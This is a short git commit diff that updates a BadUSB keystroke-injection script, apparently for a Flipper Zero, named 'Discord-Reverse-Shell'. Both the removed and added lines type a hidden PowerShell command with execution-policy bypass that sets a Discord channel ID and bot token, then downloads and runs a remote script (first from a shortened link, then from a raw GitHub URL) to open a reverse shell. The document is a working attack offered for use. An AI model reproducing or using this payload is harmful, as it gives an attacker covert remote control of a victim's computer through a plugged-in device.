Update Discord-Reverse-Shell.txt

This commit is contained in:
egieb
2024-03-27 15:33:39 +00:00
committed by GitHub
parent 1a2e1c1f72
commit aa2faad06f

View File

@@ -18,6 +18,6 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://is.gd/bwdcc2 | iex
STRING powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Discord-Reverse-Shell/main.ps1 | iex
ENTER